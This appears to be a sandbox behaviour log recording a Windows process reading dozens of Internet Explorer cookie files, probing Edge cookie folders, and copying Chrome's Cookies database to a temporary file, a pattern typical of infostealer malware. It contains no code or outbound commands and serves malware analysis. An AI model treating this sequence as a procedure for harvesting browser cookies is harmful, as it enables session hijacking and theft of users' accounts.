File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt, size = 102, size_out = 102 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt, size = 102, size_out = 102 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt, size = 93, size_out = 93 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt, size = 234, size_out = 234 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt, size = 578, size_out = 578 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt, size = 101, size_out = 101 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt, size = 82, size_out = 82 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt, size = 293, size_out = 293 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt, size = 221, size_out = 221 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt, size = 513, size_out = 513 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt, size = 490, size_out = 490 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt, size = 456, size_out = 456 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt, size = 130, size_out = 130 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt, size = 272, size_out = 272 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt, size = 598, size_out = 598 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt, size = 196, size_out = 196 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt, size = 543, size_out = 543 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt, size = 272, size_out = 272 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt, size = 118, size_out = 118 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt, size = 823, size_out = 823 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt, size = 206, size_out = 206 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt, size = 108, size_out = 108 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt, size = 104, size_out = 104 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt, size = 178, size_out = 178 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt, size = 215, size_out = 215 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt, size = 169, size_out = 169 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, size = 1026, size_out = 1026 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt, size = 1026, size_out = 1026 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Copy source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Cookies, destination_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp True 1
File Get Info filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, type = file_attributes True 1
File Create filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp, size = 100, size_out = 100 True 1
